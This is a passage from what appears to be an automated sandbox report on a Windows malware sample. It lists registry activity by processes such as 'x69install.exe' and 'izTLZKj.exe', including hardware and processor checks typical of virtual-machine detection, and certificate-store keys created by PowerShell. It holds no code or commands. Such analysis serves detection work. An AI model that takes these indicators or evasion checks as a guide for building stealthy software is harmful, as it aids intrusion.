Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\x69install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\x69install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 May 2025 00:43:59 GMT" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747701838" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\32f11c7c-3c99-47aa = 414b621c20c9db01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a0758fc9-3119-48de C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\209b8066-ed4f-494f = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c688f9-88ee-4678 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000070a3b31c20c9db01e501131d20c9db01e501131d20c9db0137ed09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000376630353262366234663631323432363161653639613266383739303561393062323331656239323961383063306631373064396432346234343361663134380000b20009000400efbeb45a5905b45a59052e000000000000000000000000000000000000000000000000002557a300370066003000350032006200360062003400660036003100320034003200360031006100650036003900610032006600380037003900300035006100390030006200320033003100650062003900320039006100380030006300300066003100370030006400390064003200340062003400340033006100660031003400380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37663035326236623466363132343236316165363961326638373930356139306232333165623932396138306330663137306439643234623434336166313438000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db8783ba5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db8783ba5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc75472c-0f5a-47b9 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004495621c20c9db014495621c20c9db014495621c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b45a59052000643962323736373336303730383432306537346432396533643132356566396230343262313966626233616230333835323861303863383130653836386331610000b20009000400efbeb45a5905b45a59052e00000000000000000000000000000000000000000000000000bccb9900640039006200320037003600370033003600300037003000380034003200300065003700340064003200390065003300640031003200350065006600390062003000340032006200310039006600620062003300610062003000330038003500320038006100300038006300380031003000650038003600380063003100610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001ba978ef1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64396232373637333630373038343230653734643239653364313235656639623034326231396662623361623033383532386130386338313065383638633161000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c7a676f6e62746a0000000000000000d07758bc69233b4ea7ba0bbf192db87837a5c5e16c27f011a617f2717f61ef81d07758bc69233b4ea7ba0bbf192db87837a5c5e16c27f011a617f2717f61ef81d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900350031003900380036003300350038002d0034003000300036003900310039003800340030002d0031003000300039003600390030003800340032002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000007c15f888000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5faf247-5257-402c = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c92eb376-4e5d-410f = "\\\\?\\Volume{88F8157C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\700a445815bf4636b5df742c548f8b4a4b8339ddb3f54de002274e7eca8174ce" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3951986358-4006919840-1009690842-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\430d0482-62a8-4622 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000006545541c20c9db016545541c20c9db016545541c20c9db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00